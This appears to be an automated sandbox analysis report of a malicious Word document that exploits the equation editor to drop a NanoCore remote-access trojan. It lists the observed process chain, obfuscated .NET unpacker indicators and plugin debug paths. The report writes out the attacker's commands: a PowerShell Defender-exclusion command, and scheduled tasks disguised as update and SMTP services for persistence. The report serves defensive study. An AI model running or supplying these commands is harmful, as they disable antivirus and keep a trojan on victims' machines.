      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............T.......D.......T.......................0.......;.......8...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......|.......................0.......G.......8.......".......H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............T.......D...............................0.......G.......8...............H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............T.......D...............................0.......S.......................H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............T.......D...............................0.......S.......8...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.........e.x.e.(.P.............T.......D...............................0......._.......8...............H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............T.......D.......+.......................0......._.......8...............H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............T.......D.......S.......................0.......k.......................H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............T.......D.......n.......................0.......k.......8...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......8.......2.......H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............T.......D...............................0.......w.......8...............H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............T.......D...............................0.......................l.......H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............T.......D...............................0...............8...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............T.......D...............................0...............8...............H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............T.......D.......9.......................0...............8...............H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.....................\.......e.................................................................".....Jump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..................%...............%.....(.P.............$.......@...............................................................................Jump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................ .......................(.P.....p.......................|.......................................................................Jump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exe C:\Users\user\AppData\Roaming\plugmancdht5461.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp
      Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0
      Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe "C:\Program Files (x86)\SMTP Service\smtpsvc.exe"
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exe C:\Users\user\AppData\Roaming\plugmancdht5461.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmpJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmpJump to behavior
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0Jump to behavior
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE3AA.tmpJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{910523a1-2f72-4f3f-a340-f1a8b5f90deb}
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMutant created: \Sessions\1\BaseNamedObjects\bigbkIthbt
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: smtpsvc.exe, smtpsvc.exe, 00000013.00000002.463928971.0000000001392000.00000020.00000001.01000000.00000006.sdmp, smtpsvc.exe, 00000013.00000000.461835651.0000000001392000.00000020.00000001.01000000.00000006.sdmp, smtpsvc.exe.9.dr
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_00FC5B04 push ecx; ret 4_2_00FC5B19
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005932B7 push cs; ret 9_2_005932B8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A410E push es; retn 0000h9_2_005A410B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A410E push es; ret 9_2_005A41D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A3DFF push es; ret 9_2_005A41D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BC400 push esp; iretd 9_2_004BC569
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BA481 push 8B6DBE42h; iretd 9_2_004BA489
      Source: initial sampleStatic PE information: section name: .text entropy: 7.85251409286
      Source: initial sampleStatic PE information: section name: .text entropy: 7.85251409286
      Source: initial sampleStatic PE information: section name: .text entropy: 7.85251409286
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
